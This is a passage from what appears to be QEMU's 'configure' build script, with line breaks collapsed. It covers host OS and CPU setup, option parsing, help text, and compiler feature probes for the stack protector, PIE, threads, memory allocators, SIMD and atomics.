make="${MAKE-gmake}" HOST_VARIANT_DIR="netbsd" supported_os="yes" ;; OpenBSD) bsd="yes" make="${MAKE-gmake}" HOST_VARIANT_DIR="openbsd" supported_os="yes" ;; Darwin) bsd="yes" darwin="yes" LDFLAGS_SHARED="-bundle -undefined dynamic_lookup" if [ "$cpu" = "x86_64" ] ; then QEMU_CFLAGS="-arch x86_64 $QEMU_CFLAGS" QEMU_LDFLAGS="-arch x86_64 $QEMU_LDFLAGS" fi QEMU_LDFLAGS="-framework CoreFoundation -framework IOKit $QEMU_LDFLAGS" libs_softmmu="-F/System/Library/Frameworks -framework IOKit $libs_softmmu" # Disable attempts to use ObjectiveC features in os/object.h since they # won't work when we're compiling with gcc as a C compiler. QEMU_CFLAGS="-DOS_OBJECT_USE_OBJC=0 $QEMU_CFLAGS" HOST_VARIANT_DIR="darwin" supported_os="yes" ;; SunOS) solaris="yes" make="${MAKE-gmake}" install="${INSTALL-ginstall}" # needed for CMSG_ macros in sys/socket.h QEMU_CFLAGS="-D_XOPEN_SOURCE=600 $QEMU_CFLAGS" # needed for TIOCWIN* defines in termios.h QEMU_CFLAGS="-D__EXTENSIONS__ $QEMU_CFLAGS" QEMU_CFLAGS="-std=gnu99 $QEMU_CFLAGS" solarisnetlibs="-lsocket -lnsl -lresolv" LIBS="$solarisnetlibs $LIBS" ;; Haiku) haiku="yes" QEMU_CFLAGS="-DB_USE_POSITIVE_POSIX_ERRORS $QEMU_CFLAGS" LIBS="-lposix_error_mapper -lnetwork $LIBS" ;; Linux) linux="yes" QEMU_INCLUDES="-isystem \$(SRC_PATH)/linux-headers -isystem $PWD/linux-headers $QEMU_INCLUDES" supported_os="yes" ;; esac : ${make=${MAKE-make}} : ${install=${INSTALL-install}} # Default objcc to clang if available, otherwise use CC if has clang; then objcc=clang else objcc="$cc" fi if test "$mingw32" = "yes" ; then EXESUF=".exe" DSOSUF=".dll" # MinGW needs -mthreads for TLS and macro _MT.
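# Besides -mthreads, the block below switches the binary suffixes
# (EXESUF=.exe, DSOSUF=.dll), links winmm/ws2_32 and probes for libiberty
# with the script's usual compile-and-link idiom; schematically (this merely
# mirrors the code that follows rather than adding a new probe):
#   write_c_skeleton
#   if compile_prog "" "-liberty" ; then LIBS="-liberty $LIBS" ; fi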
QEMU_CFLAGS="-mthreads $QEMU_CFLAGS" LIBS="-lwinmm -lws2_32 $LIBS" write_c_skeleton; if compile_prog "" "-liberty" ; then LIBS="-liberty $LIBS" fi prefix="c:/Program Files/QEMU" bindir="\${prefix}" sysconfdir="\${prefix}" local_statedir= confsuffix="" fi werror="" for opt do optarg=$(expr "x$opt" : 'x[^=]*=\(.*\)') case "$opt" in --help|-h) show_help=yes ;; --version|-V) exec cat $source_path/VERSION ;; --prefix=*) prefix="$optarg" ;; --interp-prefix=*) interp_prefix="$optarg" ;; --cross-prefix=*) ;; --cc=*) ;; --host-cc=*) host_cc="$optarg" ;; --cxx=*) ;; --iasl=*) iasl="$optarg" ;; --objcc=*) objcc="$optarg" ;; --make=*) make="$optarg" ;; --install=*) install="$optarg" ;; --extra-cflags=*) ;; --extra-cxxflags=*) ;; --extra-ldflags=*) ;; --enable-debug-info) ;; --disable-debug-info) ;; --cross-cc-*) ;; --cpu=*) ;; --target-list=*) target_list="$optarg" if test "$target_list_exclude"; then error_exit "Can't mix --target-list with --target-list-exclude" fi ;; --target-list-exclude=*) target_list_exclude="$optarg" if test "$target_list"; then error_exit "Can't mix --target-list-exclude with --target-list" fi ;; --static) static="yes" QEMU_PKG_CONFIG_FLAGS="--static $QEMU_PKG_CONFIG_FLAGS" ;; --bindir=*) bindir="$optarg" ;; --libdir=*) libdir="$optarg" ;; --libexecdir=*) libexecdir="$optarg" ;; --includedir=*) includedir="$optarg" ;; --with-confsuffix=*) confsuffix="$optarg" ;; --sysconfdir=*) sysconfdir="$optarg" ;; --localstatedir=*) local_statedir="$optarg" ;; --host=*|--build=*|\ --disable-dependency-tracking|\ --sbindir=*|--sharedstatedir=*|\ --oldincludedir=*|--datarootdir=*|--infodir=*|--localedir=*|\ --htmldir=*|--dvidir=*|--pdfdir=*|--psdir=*) # These switches are silently ignored, for compatibility with # autoconf-generated configure scripts. This allows QEMU's # configure to be used by RPM and similar macros that set # lots of directory switches by default. 
;; --enable-debug) # Enable debugging options that aren't excessively noisy debug="yes" strip_opt="no" ;; --enable-sanitizers) sanitizers="yes" ;; --disable-sanitizers) sanitizers="no" ;; --disable-strip) strip_opt="no" ;; --disable-tcg) tcg="no" ;; --enable-tcg) tcg="yes" ;; --disable-malloc-trim) malloc_trim="no" ;; --enable-malloc-trim) malloc_trim="yes" ;; --enable-system) softmmu="yes" ;; --enable-pie) pie="yes" ;; --disable-pie) pie="no" ;; --enable-werror) werror="yes" ;; --disable-werror) werror="no" ;; --enable-stack-protector) stack_protector="yes" ;; --disable-stack-protector) stack_protector="no" ;; --disable-membarrier) membarrier="no" ;; --enable-membarrier) membarrier="yes" ;; --with-pkgversion=*) pkgversion="$optarg" ;; --enable-debug-stack-usage) debug_stack_usage="yes" ;; --disable-avx2) avx2_opt="no" ;; --enable-avx2) avx2_opt="yes" ;; --disable-avx512f) avx512f_opt="no" ;; --enable-avx512f) avx512f_opt="yes" ;; --disable-virtio-blk-data-plane|--enable-virtio-blk-data-plane) echo "$0: $opt is obsolete, virtio-blk data-plane is always on" >&2 ;; --enable-vhdx|--disable-vhdx) echo "$0: $opt is obsolete, VHDX driver is always built" >&2 ;; --enable-uuid|--disable-uuid) echo "$0: $opt is obsolete, UUID support is always built" >&2 ;; --disable-tcmalloc) tcmalloc="no" ;; --enable-tcmalloc) tcmalloc="yes" ;; --disable-jemalloc) jemalloc="no" ;; --enable-jemalloc) jemalloc="yes" ;; --with-git=*) git="$optarg" ;; *) echo "ERROR: unknown option $opt" echo "Try '$0 --help' for more information" exit 1 ;; esac done case "$cpu" in ppc) CPU_CFLAGS="-m32" QEMU_LDFLAGS="-m32 $QEMU_LDFLAGS" ;; ppc64) CPU_CFLAGS="-m64" QEMU_LDFLAGS="-m64 $QEMU_LDFLAGS" ;; sparc) CPU_CFLAGS="-m32 -mv8plus -mcpu=ultrasparc" QEMU_LDFLAGS="-m32 -mv8plus $QEMU_LDFLAGS" ;; sparc64) CPU_CFLAGS="-m64 -mcpu=ultrasparc" QEMU_LDFLAGS="-m64 $QEMU_LDFLAGS" ;; s390) CPU_CFLAGS="-m31" QEMU_LDFLAGS="-m31 $QEMU_LDFLAGS" ;; s390x) CPU_CFLAGS="-m64" QEMU_LDFLAGS="-m64 $QEMU_LDFLAGS" ;; i386) CPU_CFLAGS="-m32" QEMU_LDFLAGS="-m32 $QEMU_LDFLAGS" ;; x86_64) # ??? Only extremely old AMD cpus do not have cmpxchg16b. # If we truly care, we should simply detect this case at # runtime and generate the fallback to serial emulation. CPU_CFLAGS="-m64 -mcx16" QEMU_LDFLAGS="-m64 $QEMU_LDFLAGS" ;; x32) CPU_CFLAGS="-mx32" QEMU_LDFLAGS="-mx32 $QEMU_LDFLAGS" ;; # No special flags required for other host CPUs esac eval "cross_cc_${cpu}=\$host_cc" cross_cc_vars="$cross_cc_vars cross_cc_${cpu}" QEMU_CFLAGS="$CPU_CFLAGS $QEMU_CFLAGS" default_target_list="aarch64-softmmu \ arm-softmmu m68k-softmmu mips64el-softmmu mips64-softmmu mipsel-softmmu \ mips-softmmu ppc64-softmmu ppc-softmmu sparc64-softmmu sparc-softmmu \ x86_64-softmmu riscv32-softmmu riscv64-softmmu s390x-softmmu \ tricore-softmmu" if test x"$show_help" = x"yes" ; then cat << EOF Usage: configure [options] Options: [defaults in brackets after descriptions] Standard options: --help print this message --prefix=PREFIX install in PREFIX [$prefix] --interp-prefix=PREFIX where to find shared libraries, etc. 
use %M for cpu name [$interp_prefix] --target-list=LIST set target list (default: build everything) $(echo Available targets: $default_target_list | \ fold -s -w 53 | sed -e 's/^/ /') --target-list-exclude=LIST exclude a set of targets from the default target-list Advanced options (experts only): --cross-prefix=PREFIX use PREFIX for compile tools [$cross_prefix] --cc=CC use C compiler CC [$cc] --iasl=IASL use ACPI compiler IASL [$iasl] --host-cc=CC use C compiler CC [$host_cc] for code run at build time --cxx=CXX use C++ compiler CXX [$cxx] --objcc=OBJCC use Objective-C compiler OBJCC [$objcc] --extra-cflags=CFLAGS append extra C compiler flags QEMU_CFLAGS --extra-cxxflags=CXXFLAGS append extra C++ compiler flags QEMU_CXXFLAGS --extra-ldflags=LDFLAGS append extra linker flags LDFLAGS --cross-cc-ARCH=CC use compiler when building ARCH guest test cases --cross-cc-cflags-ARCH= use compiler flags when building ARCH guest tests --make=MAKE use specified make [$make] --install=INSTALL use specified install [$install] --with-git=GIT use specified git [$git] --static enable static build [$static] --docdir=PATH install documentation in PATH$confsuffix --bindir=PATH install binaries in PATH --libdir=PATH install libraries in PATH --libexecdir=PATH install helper binaries in PATH --sysconfdir=PATH install config in PATH$confsuffix --localstatedir=PATH install local state in PATH (set at runtime on win32) --with-confsuffix=SUFFIX suffix for QEMU data inside datadir/libdir/sysconfdir [$confsuffix] --with-pkgversion=VERS use specified string as sub-version of the package --enable-debug enable common debug build options --enable-sanitizers enable default sanitizers --disable-strip disable stripping binaries --disable-werror disable compilation abort on warning --disable-stack-protector disable compiler-provided stack protection --enable-malloc-trim enable libc malloc_trim() for memory optimization --cpu=CPU Build for host CPU [$cpu] --enable-debug-stack-usage track the maximum stack usage of stacks created by qemu_alloc_stack Optional features, enabled with --enable-FEATURE and disabled with --disable-FEATURE, default is enabled if available: pie Position Independent Executables debug-tcg TCG debugging (default is disabled) membarrier membarrier system call (for Linux 4.14+ or Windows) tcmalloc tcmalloc support jemalloc jemalloc support avx2 AVX2 optimization support avx512f AVX512F optimization support NOTE: The object files are built at the place where configure is launched EOF exit 0 fi # Remove old dependency files to make sure that they get properly regenerated rm -f */config-devices.mak.d # Check that the C compiler works. Doing this here before testing # the host CPU ensures that we had a valid CC to autodetect the # $cpu var (and we should bail right here if that's not the case). # It also allows the help message to be printed without a CC. write_c_skeleton; if compile_object ; then : C compiler works ok else error_exit "\"$cc\" either does not exist or does not work" fi if ! compile_prog ; then error_exit "\"$cc\" cannot build an executable (is your linker broken?)" fi # Now we have handled --enable-tcg-interpreter and know we're not just # printing the help message, bail out if the host CPU isn't supported. if test "$ARCH" = "unknown"; then error_exit "Unsupported CPU = $cpu, try --enable-tcg-interpreter" fi # Consult white-list to determine whether to enable werror # by default.
Only enable by default for git builds if test -z "$werror" ; then if test -e "$source_path/.git" && \ { test "$linux" = "yes" || test "$mingw32" = "yes"; }; then werror="yes" else werror="no" fi fi if test "$bogus_os" = "yes"; then # Now that we know that we're not printing the help and that # the compiler works (so the results of the check_defines we used # to identify the OS are reliable), if we didn't recognize the # host OS we should stop now. error_exit "Unrecognized host OS (uname -s reports '$(uname -s)')" fi # Check whether the compiler matches our minimum requirements: cat > $TMPC << EOF #if defined(__clang_major__) && defined(__clang_minor__) # ifdef __apple_build_version__ # if __clang_major__ < 5 || (__clang_major__ == 5 && __clang_minor__ < 1) # error You need at least XCode Clang v5.1 to compile QEMU # endif # else # if __clang_major__ < 3 || (__clang_major__ == 3 && __clang_minor__ < 4) # error You need at least Clang v3.4 to compile QEMU # endif # endif #elif defined(__GNUC__) && defined(__GNUC_MINOR__) # if __GNUC__ < 4 || (__GNUC__ == 4 && __GNUC_MINOR__ < 8) # error You need at least GCC v4.8 to compile QEMU # endif #else # error You either need GCC or Clang to compile QEMU #endif int main (void) { return 0; } EOF if ! compile_prog "" "" ; then error_exit "You need at least GCC v4.8 or Clang v3.4 (or XCode Clang v5.1)" fi gcc_flags="-Wold-style-declaration -Wold-style-definition -Wtype-limits" gcc_flags="-Wformat-security -Wformat-y2k -Winit-self -Wignored-qualifiers $gcc_flags" gcc_flags="-Wno-missing-include-dirs -Wempty-body -Wnested-externs $gcc_flags" gcc_flags="-Wendif-labels -Wno-shift-negative-value $gcc_flags" gcc_flags="-Wno-initializer-overrides -Wexpansion-to-defined $gcc_flags" gcc_flags="-Wno-string-plus-int -Wno-typedef-redefinition $gcc_flags" # Note that we do not add -Werror to gcc_flags here, because that would # enable it for all configure tests. If a configure test failed due # to -Werror this would just silently disable some features, # so it's too error prone. cc_has_warning_flag() { write_c_skeleton; # Use the positive sense of the flag when testing for -Wno-wombat # support (gcc will happily accept the -Wno- form of unknown # warning options). optflag="$(echo $1 | sed -e 's/^-Wno-/-W/')" compile_prog "-Werror $optflag" "" } for flag in $gcc_flags; do if cc_has_warning_flag $flag ; then QEMU_CFLAGS="$QEMU_CFLAGS $flag" fi done if test "$stack_protector" != "no"; then cat > $TMPC << EOF int main(int argc, char *argv[]) { char arr[64], *p = arr, *c = argv[0]; while (*c) { *p++ = *c++; } return 0; } EOF gcc_flags="-fstack-protector-strong -fstack-protector-all" sp_on=0 for flag in $gcc_flags; do # We need to check both a compile and a link, since some compiler # setups fail only on a .c->.o compile and some only at link time if do_cc $QEMU_CFLAGS -Werror $flag -c -o $TMPO $TMPC && compile_prog "-Werror $flag" ""; then QEMU_CFLAGS="$QEMU_CFLAGS $flag" QEMU_LDFLAGS="$QEMU_LDFLAGS $flag" sp_on=1 break fi done if test "$stack_protector" = yes; then if test $sp_on = 0; then error_exit "Stack protector not supported" fi fi fi # Disable -Wmissing-braces on older compilers that warn even for # the "universal" C zero initializer {0}. cat > $TMPC << EOF struct { int a[2]; } x = {0}; EOF if compile_object "-Werror" "" ; then : else QEMU_CFLAGS="$QEMU_CFLAGS -Wno-missing-braces" fi # Unconditional check for compiler __thread support cat > $TMPC << EOF static __thread int tls_var; int main(void) { return tls_var; } EOF if !
compile_prog "-Werror" "" ; then error_exit "Your compiler does not support the __thread specifier for " \ "Thread-Local Storage (TLS). Please upgrade to a version that does." fi cat > $TMPC << EOF #ifdef __linux__ # define THREAD __thread #else # define THREAD #endif static THREAD int tls_var; int main(void) { return tls_var; } EOF if test "$static" = "yes"; then if test "$pie" != "no" && compile_prog "-Werror -fPIE -DPIE" "-static-pie"; then QEMU_CFLAGS="-fPIE -DPIE $QEMU_CFLAGS" QEMU_LDFLAGS="-static-pie $QEMU_LDFLAGS" pie="yes" elif test "$pie" = "yes"; then error_exit "-static-pie not available due to missing toolchain support" else QEMU_LDFLAGS="-static $QEMU_LDFLAGS" pie="no" fi elif test "$pie" = "no"; then QEMU_CFLAGS="$CFLAGS_NOPIE $QEMU_CFLAGS" QEMU_LDFLAGS="$LDFLAGS_NOPIE $QEMU_LDFLAGS" elif compile_prog "-Werror -fPIE -DPIE" "-pie"; then QEMU_CFLAGS="-fPIE -DPIE $QEMU_CFLAGS" QEMU_LDFLAGS="-pie $QEMU_LDFLAGS" pie="yes" elif test "$pie" = "yes"; then error_exit "PIE not available due to missing toolchain support" else echo "Disabling PIE due to missing toolchain support" pie="no" fi # Detect support for PT_GNU_RELRO + DT_BIND_NOW. # The combination is known as "full relro", because .got.plt is read-only too. if compile_prog "" "-Wl,-z,relro -Wl,-z,now" ; then QEMU_LDFLAGS="-Wl,-z,relro -Wl,-z,now $QEMU_LDFLAGS" fi ########################################## # __sync_fetch_and_and requires at least -march=i486. Many toolchains # use i686 as default anyway, but for those that don't, an explicit # specification is necessary if test "$cpu" = "i386"; then cat > $TMPC << EOF static int sfaa(int *ptr) { return __sync_fetch_and_and(ptr, 0); } int main(void) { int val = 42; val = __sync_val_compare_and_swap(&val, 0, 1); sfaa(&val); return val; } EOF if ! compile_prog "" "" ; then QEMU_CFLAGS="-march=i486 $QEMU_CFLAGS" fi fi ######################################### # Solaris specific configure tool chain decisions if test "$solaris" = "yes" ; then if has $install; then : else error_exit "Solaris install program not found. Use --install=/usr/ucb/install or" \ "install fileutils from www.blastwave.org using pkg-get -i fileutils" \ "to get ginstall which is used by default (which lives in /opt/csw/bin)" fi if test "$(path_of $install)" = "/usr/sbin/install" ; then error_exit "Solaris /usr/sbin/install is not an appropriate install program." \ "try ginstall from the GNU fileutils available from www.blastwave.org" \ "using pkg-get -i fileutils, or use --install=/usr/ucb/install" fi if has ar; then : else if test -f /usr/ccs/bin/ar ; then error_exit "No path includes ar" \ "Add /usr/ccs/bin to your path and rerun configure" fi error_exit "No path includes ar" fi fi if test -z "${target_list+xxx}" ; then for target in $default_target_list; do supported_target $target 2>/dev/null && \ target_list="$target_list $target" done target_list="${target_list# }" else target_list=$(echo "$target_list" | sed -e 's/,/ /g') for target in $target_list; do # Check that we recognised the target name; this allows a more # friendly error message than if we let it fall through. case " $default_target_list " in *" $target "*) ;; *) error_exit "Unknown target name '$target'" ;; esac supported_target $target || exit 1 done fi # see if system emulation was really requested case " $target_list " in *"-softmmu "*) softmmu=yes ;; *) softmmu=no ;; esac feature_not_found() { feature=$1 remedy=$2 error_exit "User requested feature $feature" \ "configure was not able to find it." 
\ "$remedy" } # --- # big/little endian test cat > $TMPC << EOF short big_endian[] = { 0x4269, 0x4765, 0x4e64, 0x4961, 0x4e00, 0, }; short little_endian[] = { 0x694c, 0x7454, 0x654c, 0x6e45, 0x6944, 0x6e41, 0, }; extern int foo(short *, short *); int main(int argc, char *argv[]) { return foo(big_endian, little_endian); } EOF if compile_object ; then if strings -a $TMPO | grep -q BiGeNdIaN ; then bigendian="yes" elif strings -a $TMPO | grep -q LiTtLeEnDiAn ; then bigendian="no" else echo big/little test failed fi else echo big/little test failed fi ########################################## # pkg-config probe if ! has "$pkg_config_exe"; then error_exit "pkg-config binary '$pkg_config_exe' not found" fi ########################################## # pthread probe PTHREADLIBS_LIST="-pthread -lpthread -lpthreadGC2" pthread=no cat > $TMPC << EOF #include <pthread.h> static void *f(void *p) { return NULL; } int main(void) { pthread_t thread; pthread_create(&thread, 0, f, 0); return 0; } EOF if compile_prog "" "" ; then pthread=yes else for pthread_lib in $PTHREADLIBS_LIST; do if compile_prog "" "$pthread_lib" ; then pthread=yes found=no for lib_entry in $LIBS; do if test "$lib_entry" = "$pthread_lib"; then found=yes break fi done if test "$found" = "no"; then LIBS="$pthread_lib $LIBS" fi PTHREAD_LIB="$pthread_lib" break fi done fi if test "$mingw32" != yes && test "$pthread" = no; then error_exit "pthread check failed" \ "Make sure to have the pthread libs and headers installed." fi # check for pthread_setname_np with thread id pthread_setname_np_w_tid=no cat > $TMPC << EOF #include <pthread.h> static void *f(void *p) { return NULL; } int main(void) { pthread_t thread; pthread_create(&thread, 0, f, 0); pthread_setname_np(thread, "QEMU"); return 0; } EOF if compile_prog "" "$pthread_lib" ; then pthread_setname_np_w_tid=yes fi # check for pthread_setname_np without thread id pthread_setname_np_wo_tid=no cat > $TMPC << EOF #include <pthread.h> static void *f(void *p) { pthread_setname_np("QEMU"); return NULL; } int main(void) { pthread_t thread; pthread_create(&thread, 0, f, 0); return 0; } EOF if compile_prog "" "$pthread_lib" ; then pthread_setname_np_wo_tid=yes fi if test "$tcmalloc" = "yes" && test "$jemalloc" = "yes" ; then echo "ERROR: tcmalloc && jemalloc can't be used at the same time" exit 1 fi # Even if malloc_trim() is available, these non-libc memory allocators # do not support it.
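# (Background: glibc's malloc_trim(0) asks the allocator to return free heap
# pages to the kernel; tcmalloc and jemalloc replace malloc wholesale and do
# not provide that call, which is why the test below forces malloc_trim=no
# whenever one of them is selected.)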
if test "$tcmalloc" = "yes" || test "$jemalloc" = "yes" ; then if test "$malloc_trim" = "yes" ; then echo "Disabling malloc_trim with non-libc memory allocator" fi malloc_trim="no" fi ####################################### # malloc_trim if test "$malloc_trim" != "no" ; then cat > $TMPC << EOF #include <malloc.h> int main(void) { malloc_trim(0); return 0; } EOF if compile_prog "" "" ; then malloc_trim="yes" else malloc_trim="no" fi fi ########################################## # tcmalloc probe if test "$tcmalloc" = "yes" ; then cat > $TMPC << EOF #include <stdlib.h> int main(void) { malloc(1); return 0; } EOF if compile_prog "" "-ltcmalloc" ; then LIBS="-ltcmalloc $LIBS" else feature_not_found "tcmalloc" "install gperftools devel" fi fi ########################################## # jemalloc probe if test "$jemalloc" = "yes" ; then cat > $TMPC << EOF #include <stdlib.h> int main(void) { malloc(1); return 0; } EOF if compile_prog "" "-ljemalloc" ; then LIBS="-ljemalloc $LIBS" else feature_not_found "jemalloc" "install jemalloc devel" fi fi ########################################## # signalfd probe signalfd="no" cat > $TMPC << EOF #include <unistd.h> #include <sys/syscall.h> #include <signal.h> int main(void) { return syscall(SYS_signalfd, -1, NULL, _NSIG / 8); } EOF if compile_prog "" "" ; then signalfd=yes fi # check for sync_file_range sync_file_range=no cat > $TMPC << EOF #include <fcntl.h> int main(void) { sync_file_range(0, 0, 0, 0); return 0; } EOF if compile_prog "" "" ; then sync_file_range=yes fi # check for dup3 dup3=no cat > $TMPC << EOF #include <unistd.h> int main(void) { dup3(0, 0, 0); return 0; } EOF if compile_prog "" "" ; then dup3=yes fi # check for prctl(PR_SET_TIMERSLACK , ... ) support prctl_pr_set_timerslack=no cat > $TMPC << EOF #include <sys/prctl.h> int main(void) { prctl(PR_SET_TIMERSLACK, 1, 0, 0, 0); return 0; } EOF if compile_prog "" "" ; then prctl_pr_set_timerslack=yes fi # check for epoll support epoll=no cat > $TMPC << EOF #include <sys/epoll.h> int main(void) { epoll_create(0); return 0; } EOF if compile_prog "" "" ; then epoll=yes fi # clock_adjtime probe clock_adjtime=no cat > $TMPC <<EOF #include <time.h> int main(void) { return clock_adjtime(0, 0); } EOF if compile_prog "" "" ; then clock_adjtime=yes fi # syncfs probe syncfs=no cat > $TMPC <<EOF #include <unistd.h> int main(void) { return syncfs(0); } EOF if compile_prog "" "" ; then syncfs=yes fi # Search for bswap_32 function byteswap_h=no cat > $TMPC << EOF #include <byteswap.h> int main(void) { return bswap_32(0); } EOF if compile_prog "" "" ; then byteswap_h=yes fi # Search for bswap32 function bswap_h=no cat > $TMPC << EOF #include <sys/endian.h> #include <sys/types.h> #include <machine/bswap.h> int main(void) { return bswap32(0); } EOF if compile_prog "" "" ; then bswap_h=yes fi ########################################## # Do we need libm cat > $TMPC << EOF #include <math.h> int main(int argc, char **argv) { return isnan(sin((double)argc)); } EOF if compile_prog "" "" ; then : elif compile_prog "" "-lm" ; then LIBS="-lm $LIBS" else error_exit "libm check failed" fi ########################################## # Do we need librt # uClibc provides 2 versions of clock_gettime(), one with realtime # support and one without. This means that clock_gettime() doesn't # need -lrt. We still need it for timer_create() so we check for this # function in addition.
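# The librt probe below uses the configure-wide fallback pattern: build the
# test program against plain libc first, and only grow $LIBS when a retry
# with the candidate library succeeds; schematically:
#   compile_prog "" "" || { compile_prog "" "$pthread_lib -lrt" && LIBS="$LIBS -lrt"; }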
cat > $TMPC <<EOF #include <signal.h> #include <time.h> int main(void) { timer_create(CLOCK_REALTIME, NULL, NULL); return clock_gettime(CLOCK_REALTIME, NULL); } EOF if compile_prog "" "" ; then : # we need pthread for static linking. use previous pthread test result elif compile_prog "" "$pthread_lib -lrt" ; then LIBS="$LIBS -lrt" fi # Check whether we need to link libutil for openpty() cat > $TMPC << EOF extern int openpty(int *am, int *as, char *name, void *termp, void *winp); int main(void) { return openpty(0, 0, 0, 0, 0); } EOF if ! compile_prog "" "" ; then if compile_prog "" "-lutil" ; then libs_softmmu="-lutil $libs_softmmu" libs_tools="-lutil $libs_tools" fi fi ########################################## # check if we have madvise madvise=no cat > $TMPC << EOF #include <sys/types.h> #include <sys/mman.h> #include <stddef.h> int main(void) { return madvise(NULL, 0, MADV_DONTNEED); } EOF if compile_prog "" "" ; then madvise=yes fi ########################################## # check if we have posix_madvise posix_madvise=no cat > $TMPC << EOF #include <sys/mman.h> #include <stddef.h> int main(void) { return posix_madvise(NULL, 0, POSIX_MADV_DONTNEED); } EOF if compile_prog "" "" ; then posix_madvise=yes fi ########################################## # check if we have posix_memalign() posix_memalign=no cat > $TMPC << EOF #include <stdlib.h> int main(void) { void *p; return posix_memalign(&p, 8, 8); } EOF if compile_prog "" "" ; then posix_memalign=yes fi ########################################## # check if we have posix_syslog posix_syslog=no cat > $TMPC << EOF #include <syslog.h> int main(void) { openlog("qemu", LOG_PID, LOG_DAEMON); syslog(LOG_INFO, "configure"); return 0; } EOF if compile_prog "" "" ; then posix_syslog=yes fi ########################################## # check if we have sem_timedwait sem_timedwait=no cat > $TMPC << EOF #include <semaphore.h> int main(void) { sem_t s; struct timespec t = {0}; return sem_timedwait(&s, &t); } EOF if compile_prog "" "" ; then sem_timedwait=yes fi ########################################## # check if we have strchrnul strchrnul=no cat > $TMPC << EOF #include <string.h> int main(void); // Use a haystack that the compiler shouldn't be able to constant fold char *haystack = (char*)&main; int main(void) { return strchrnul(haystack, 'x') != &haystack[6]; } EOF if compile_prog "" "" ; then strchrnul=yes fi ######################################### # check if we have st_atim st_atim=no cat > $TMPC << EOF #include <sys/stat.h> #include <stddef.h> int main(void) { return offsetof(struct stat, st_atim); } EOF if compile_prog "" "" ; then st_atim=yes fi ########################################## # check if we have open_by_handle_at open_by_handle_at=no cat > $TMPC << EOF #include <fcntl.h> #if !defined(AT_EMPTY_PATH) # error missing definition #else int main(void) { struct file_handle fh; return open_by_handle_at(0, &fh, 0); } #endif EOF if compile_prog "" "" ; then open_by_handle_at=yes fi ######################################## # check if we have linux/magic.h linux_magic_h=no cat > $TMPC << EOF #include <linux/magic.h> int main(void) { return 0; } EOF if compile_prog "" "" ; then linux_magic_h=yes fi ######################################## # check whether we can disable warning option with a pragma (this is needed # to silence warnings in the headers of some versions of external libraries). # This test has to be compiled with -Werror as otherwise an unknown pragma is # only a warning. 
# # If we can't selectively disable warning in the code, disable -Werror so that # the build doesn't fail anyway. pragma_disable_unused_but_set=no cat > $TMPC << EOF #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wstrict-prototypes" #pragma GCC diagnostic pop int main(void) { return 0; } EOF if compile_prog "-Werror" "" ; then pragma_diagnostic_available=yes else werror=no fi ######################################## # check if environ is declared has_environ=no cat > $TMPC << EOF #include <unistd.h> int main(void) { environ = 0; return 0; } EOF if compile_prog "" "" ; then has_environ=yes fi ######################################## # check if cpuid.h is usable. cat > $TMPC << EOF #include <cpuid.h> int main(void) { unsigned a, b, c, d; int max = __get_cpuid_max(0, 0); if (max >= 1) { __cpuid(1, a, b, c, d); } if (max >= 7) { __cpuid_count(7, 0, a, b, c, d); } return 0; } EOF if compile_prog "" "" ; then cpuid_h=yes fi ########################################## # avx2 optimization requirement check # # There is no point enabling this if cpuid.h is not usable, # since we won't be able to select the new routines. if test "$cpuid_h" = "yes" && test "$avx2_opt" != "no"; then cat > $TMPC << EOF #pragma GCC push_options #pragma GCC target("avx2") #include <cpuid.h> #include <immintrin.h> static int bar(void *a) { __m256i x = *(__m256i *)a; return _mm256_testz_si256(x, x); } int main(int argc, char *argv[]) { return bar(argv[0]); } EOF if compile_object "" ; then avx2_opt="yes" else avx2_opt="no" fi fi ########################################## # avx512f optimization requirement check # # There is no point enabling this if cpuid.h is not usable, # since we won't be able to select the new routines. # by default, it is turned off. # if the user explicitly wants to enable it, check the environment if test "$cpuid_h" = "yes" && test "$avx512f_opt" = "yes"; then cat > $TMPC << EOF #pragma GCC push_options #pragma GCC target("avx512f") #include <cpuid.h> #include <immintrin.h> static int bar(void *a) { __m512i x = *(__m512i *)a; return _mm512_test_epi64_mask(x, x); } int main(int argc, char *argv[]) { return bar(argv[0]); } EOF if ! compile_object "" ; then avx512f_opt="no" fi else avx512f_opt="no" fi ######################################## # check if __[u]int128_t is usable. int128=no cat > $TMPC << EOF __int128_t a; __uint128_t b; int main (void) { a = a + b; b = a * b; a = a * a; return 0; } EOF if compile_prog "" "" ; then int128=yes fi ######################################### # See if 128-bit atomic operations are supported. atomic128=no if test "$int128" = "yes"; then cat > $TMPC << EOF int main(void) { unsigned __int128 x = 0, y = 0; y = __atomic_load_16(&x, 0); __atomic_store_16(&x, y, 0); __atomic_compare_exchange_16(&x, &y, x, 0, 0, 0); return 0; } EOF if compile_prog "" "" ; then atomic128=yes fi fi cmpxchg128=no if test "$int128" = yes && test "$atomic128" = no; then cat > $TMPC << EOF int main(void) { unsigned __int128 x = 0, y = 0; __sync_val_compare_and_swap_16(&x, y, x); return 0; } EOF if compile_prog "" "" ; then cmpxchg128=yes fi fi ######################################### # See if 64-bit atomic operations are supported. # Note that without __atomic builtins, we can only # assume atomic loads/stores max at pointer size.
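# Concretely, the probe below exercises __atomic_load_8/__atomic_store_8 and
# friends when __ATOMIC_RELAXED is defined, and otherwise falls back to the
# legacy __sync_* builtins plus a compile-time check that a pointer is at
# least 64 bits wide; if either variant links, CONFIG_ATOMIC64=y is emitted
# into config-host.mak further down.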
cat > $TMPC << EOF #include <stdint.h> int main(void) { uint64_t x = 0, y = 0; #ifdef __ATOMIC_RELAXED y = __atomic_load_8(&x, 0); __atomic_store_8(&x, y, 0); __atomic_compare_exchange_8(&x, &y, x, 0, 0, 0); __atomic_exchange_8(&x, y, 0); __atomic_fetch_add_8(&x, y, 0); #else typedef char is_host64[sizeof(void *) >= sizeof(uint64_t) ? 1 : -1]; __sync_lock_test_and_set(&x, y); __sync_val_compare_and_swap(&x, y, 0); __sync_fetch_and_add(&x, y); #endif return 0; } EOF if compile_prog "" "" ; then atomic64=yes fi ######################################### # See if --dynamic-list is supported by the linker ld_dynamic_list="no" if test "$static" = "no" ; then cat > $TMPTXT <<EOF { foo; }; EOF cat > $TMPC <<EOF #include <stdio.h> void foo(void); void foo(void) { printf("foo\n"); } int main(void) { foo(); return 0; } EOF if compile_prog "" "-Wl,--dynamic-list=$TMPTXT" ; then ld_dynamic_list="yes" fi fi ######################################### # See if -exported_symbols_list is supported by the linker ld_exported_symbols_list="no" if test "$static" = "no" ; then cat > $TMPTXT <<EOF _foo EOF if compile_prog "" "-Wl,-exported_symbols_list,$TMPTXT" ; then ld_exported_symbols_list="yes" fi fi ######################################## # See if 